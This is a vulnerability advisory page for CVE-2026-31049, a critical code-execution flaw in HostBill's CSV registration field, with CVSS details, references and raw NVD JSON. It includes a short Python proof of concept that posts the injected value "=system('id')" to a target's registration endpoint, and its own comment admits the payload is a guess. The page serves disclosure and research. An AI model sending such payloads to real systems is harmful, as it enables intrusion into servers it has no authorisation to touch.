Security Vulnerability Report
中文
CVE-2026-31049 CVSS 9.8 CRITICAL

CVE-2026-31049

Published: 2026-04-14 14:16:13
Last Modified: 2026-04-27 19:18:47

Description

An issue in Hostbill v.2025-11-24 and 2025-12-01 allows a remote attacker to execute arbitrary code and escalate privileges via the CSV registration field

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Hostbill v.2025-11-24
Hostbill v.2025-12-01

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Exploit Title: HostBill CVE-2026-31049 Remote Code Execution via CSV Field # Description: PoC to trigger RCE by sending malicious payload to the registration endpoint. target_url = "http://target-host/index.php" # Malicious payload injected into the CSV registration field # Payload structure depends on the specific vulnerable parameter payload_data = { "action": "register", "csv_field": "=system('id')" # Example payload simulating code execution } headers = { "User-Agent": "CVE-2026-31049-Scanner", "Content-Type": "application/x-www-form-urlencoded" } try: response = requests.post(target_url, data=payload_data, headers=headers, timeout=10) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Check the response for command execution output.") print(response.text[:200]) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31049", "sourceIdentifier": "[email protected]", "published": "2026-04-14T14:16:13.130", "lastModified": "2026-04-27T19:18:46.690", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in Hostbill v.2025-11-24 and 2025-12-01 allows a remote attacker to execute arbitrary code and escalate privileges via the CSV registration field"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1236"}]}], "references": [{"url": "https://blog.hostbillapp.com/2025/12/03/hostbill-security-advisory/", "source": "[email protected]"}, {"url": "https://github.com/Muhammad5235/HostBill-CVEs-2025/blob/main/Missing%20Server-Side%20Validation/Registration%20fields%20%26%20Import%20Csv", "source": "[email protected]"}, {"url": "https://hostbillapp.com/changelog", "source": "[email protected]"}, {"url": "https://hostbillapp.com/release-notes/11-27-2025.html", "source": "[email protected]"}, {"url": "https://hostbillapp.com/release-notes/12-01-2025.html", "source": "[email protected]"}, {"url": "https://hostbillapp.com/responsible-disclosure", "source": "[email protected]"}]}}